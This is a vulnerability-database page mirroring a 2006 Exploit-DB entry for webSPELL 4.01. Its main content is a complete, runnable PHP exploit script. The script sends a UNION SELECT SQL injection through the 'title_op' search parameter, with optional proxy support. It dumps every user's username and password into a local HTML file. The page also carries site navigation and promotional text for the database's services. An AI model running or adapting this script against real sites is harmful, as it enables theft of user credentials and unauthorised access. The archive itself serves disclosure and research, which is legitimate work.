Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

webSPELL 4.01 - 'title_op' SQL Injection

🗓️ 14 Feb 2006 00:00:00Reported by x128Type 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 31 Views

'webSPELL 4.01 - title_op' SQL Injection in webspell-401-exploit.ph

Code
<?
error_reporting(E_ERROR);

function xss_init()
{
    if (!extension_loaded('php_curl'))
    {
       if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
       die ("oo error - cannot load curl extension!");
    }
}

function xss_header()
{
    echo "\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    echo "                                  oo    ooooooo     ooooooo\n";
    echo "                    oooo   oooo o888  o88     888 o888   888o\n";
    echo "                      888o888    888        o888   888888888\n";
    echo "                      o88888o    888     o888   o 888o   o888\n";
    echo "                    o88o   o88o o888o o8888oooo88   88ooo88\n";
    echo "oooooooooooooooooooooooooooo webspell 4.01 exploit ooooooooooooooooooooooooooooo\n";
    echo "oo usage          $ php webspell-401-exploit.php [url] [prefix]\n";
    echo "oo proxy support  $ php webspell-401-exploit.php [url] [prefix] [proxy]:[port]\n";
    echo "oo example        $ php webspell-401-exploit.php http://localhost webs_\n";
    echo "oo open the file webspell_pw.html - there you find the passwords of all users\n\n";
}

function xss_bottom()
{
    echo "\noo discover : x128 - alexander wilhelm - 13/02/2006\n";
    echo "oo contact  : exploit <at> x128.net                    oo website : www.x128.net";
}

function xss_exploit()
{
    $xss_target = $_SERVER['argv'][1] . "/index.php";
    $xss_http_get = "?site=search&action=search";
    $xss_http_post = "table=news&title1=9a39b0c5e6849658e30d1432a308103d&title_op=UNION SELECT 1, 1, 1, 1, username, `password`, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 FROM ". $_SERVER['argv'][2] ."user/*";

    $xss_connection = curl_init();

    if ($_SERVER['argv'][3])
    {
        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
    }

    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target . $xss_http_get);
    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
    curl_setopt ($xss_connection, CURLOPT_POST, 1);
    curl_setopt ($xss_connection, CURLOPT_POSTFIELDS, $xss_http_post);
    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');

    $xss_source = curl_exec($xss_connection) or die("oo error - cannot connect!");

    if ($xss_source) echo "oo dafaced ...\n";

    $xss_output = fopen("webspell_pw.html","w");
    fputs($xss_output, $xss_source);
    fclose($xss_output);

    curl_close ($xss_connection); 
}

xss_init();
xss_header();
xss_exploit();
xss_bottom();
?>

# milw0rm.com [2006-02-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Feb 2006 00:00Current
7High risk
Vulners AI Score7
webspell 4.01sql injectionwebspell-401-exploit.phpcurl extensionpassword exposurex128 - alexander wilhelm
31